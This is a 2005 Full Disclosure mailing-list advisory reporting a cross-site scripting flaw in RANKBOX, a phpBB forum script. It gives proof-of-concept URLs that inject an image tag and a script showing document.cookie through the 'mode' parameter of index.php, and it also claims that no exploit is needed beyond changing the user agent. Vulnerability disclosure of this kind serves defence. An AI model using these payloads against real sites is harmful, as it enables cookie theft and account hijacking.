|
Full Disclosure
mailing list archives
RANKBOX <= XSS vulnerability
From: "spyburn mexico rlz" <spy-burn () hotmail com>
Date: Mon, 07 Nov 2005 13:29:41 -0800
#####################################################################################
# #
# Advisory #1 Title:
#
# "RANKBOX <= XSS vulnerability"
#
# #
# Author: spyburn #
# Contact: spy-burn () hotmail com #
# Website: elitemexico.org #
# Date: 07/11/2005 #
# Risk: High #
# Vendor Url: http://chamberofgold.com #
# Affected Software: RANKBOX
#
# Non Affected: #
# #
# We Are: ELITE MEXICO #
#####################################################################################
---------------------------------------------------------
:: Description ::
script for forums phpbb
---------------------------------------------------------
####################
:: Vulnerabilitie ::
####################
- | "xss" | -
directori afeccted is /index.php?mode=<IMG SRC=http://site.com/image.jpg>
/index.php?mode=<script>alert(document.cookie)</script>
--------------------------------------------------------
############
::Exploit::
############
no exploit is requiered, the only think you need to do is change your user
agent
----------------------------------------------------------
#######
GREETZ
#######
Visit: www.elitemexico.org
greetz: raza mexicana, mexican hackers mafia , cum, fraude, 0o_zeus_o0
#############################################################
_________________________________________________________________
MSN Premium. Protégete, Comunícate y Diviértete
http://join.msn.com/?pgmarket=es-mx&page=byoa/prem&xAPID=989&DI=233&SU=http://www.t1msn.com.mx/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
- RANKBOX <= XSS vulnerability spyburn mexico rlz (Nov 07)
| 
Intro
